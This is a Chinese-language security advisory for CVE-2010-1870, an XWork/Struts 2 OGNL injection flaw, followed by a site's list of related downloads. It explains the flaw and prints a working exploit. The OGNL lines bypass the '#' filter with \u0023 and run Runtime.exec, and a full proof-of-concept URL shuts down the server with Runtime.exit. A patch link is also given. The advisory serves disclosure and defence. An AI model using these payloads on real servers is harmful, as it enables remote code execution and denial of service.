XWork ParameterInterceptor类绕过安全限制漏洞
受影响系统:
OpenSymphony XWork < 2.2.0
Apache Group Struts < 2.2.0
描述:
CVE ID: CVE-2010-1870
XWork是一个命令模式框架,用于支持Struts 2及其他应用。
Struts2中WebWork框架使用XWork基于HTTP参数名执行操作和调用,将每个HTTP参数名处理为OGNL(对象图形导航语言)语句,而OGNL将:
user.address.city=Bishkek&user['favoriteDrink']=kumys
转换为:
action.getUser().getAddress().setCity("Bishkek")
action.getUser().setFavoriteDrink("kumys")
这是通过ParametersInterceptor来执行的,使用用户提供的HTTP参数调用ValueStack.setValue()。
除了获取和设置属性外,OGNL还支持其他一些功能:
* 方法调用:foo()
* 静态方式调用: @java.lang.System@exit(1)
* 构建函数调用:new MyClass()
* 处理上下文变量:#foo = new MyClass()
由于HTTP参数名为OGNL语句,为了防范攻击者通过HTTP参数调用任意方式,XWork使用了以下两个变量保护方式的执行:
* OgnlContext的属性xwork.MethodAccessor.denyMethodExecution(默认设置为true)
* SecurityMemberAccess私有字段allowStaticMethodAccess(默认设置为false)
为了方便开发人员访问各种常用的对象,XWork提供了一些预定义的上下文变量:
* #application
* #session
* #request
* #parameters
* #attr
* #context
* #_memberAccess
* #root
* #this
* #_typeResolver
* #_classResolver
* #_traceEvaluations
* #_lastEvaluation
* #_keepLastEvaluation
这些变量代表各种服务器端对象。为了防范篡改服务器端对象,XWork的ParametersInterceptor不允许参数名中出现“#”字符,但如果使用了Java的unicode字符串表示\u0023,攻击者就可以绕过保护,修改保护Java方式执行的值:
#_memberAccess['allowStaticMethodAccess'] = true
#foo = new java .lang.Boolean("false")
#context['xwork.MethodAccessor.denyMethodExecution'] = #foo
#rt = @java.lang.Runtime@getRuntime()
#rt.exec('mkdir /tmp/PWNED')
<*来源:Meder Kydyraliev (bugtraq@web.areopag.net)
链接:http://secunia.com/advisories/32495/
http://www.exploit-db.com/exploits/14360/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://mydomain/MyStruts.action?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
建议:
厂商补丁:
Apache Group
------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.apache.org/viewvc?view=revision&revision=956389
分享到:
相关推荐
绿盟漏洞扫描工具使用手册,不仅有详细的漏洞扫描手册,更有快捷、通俗易懂的快速使用指南与简捷的用户手册,你值得拥有!
绿盟
绿盟安全中心产品使用手册;绿盟安全中心产品使用手册;
能够对绿盟极光安全扫描器扫描出来的报告进行二次加工,目前可生成主机报告以及web报告。原先的绿盟生成出来的Excel格式报告非常乱,而且不好归类,我写了个宏将扫描出来后的主机问题全部按照漏洞类型,风险描述,...
绿盟笔试资料,吕蒙笔试试题,绿盟笔试答案
绿盟大数据安全分析平台产品白皮书、绿盟大数据安全分析平台产品白皮书
绿盟售前工程师NSSP试题 ,115题 带部分答案, ,准备考绿盟售前工程师的朋友,可以看看!很有用!
绿盟\绿盟 绿盟\绿盟 绿盟\绿盟 绿盟\绿盟 绿盟\绿盟
绿盟网络入侵防护系统用户使用手册安全防护手册
绿盟下一代防火墙产品白皮书.pdf
中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题中联绿盟面试技术题...
绿盟软件 GIF编辑器 绿盟软件 GIF编辑器
绿盟ids白皮书。v5.6.3。讨厌的20字。。。。。。。。。。。。。。。。。
绿盟极光引擎使用手册绿盟极光引擎使用手册绿盟极光引擎使用手册
2021年绿盟科技校园招聘笔试题.pdf
绿盟获取进程名.htm
绿盟科技产品测试面试资料、网络安全。。。。。。。。。。。。。。。。。。。。。。。。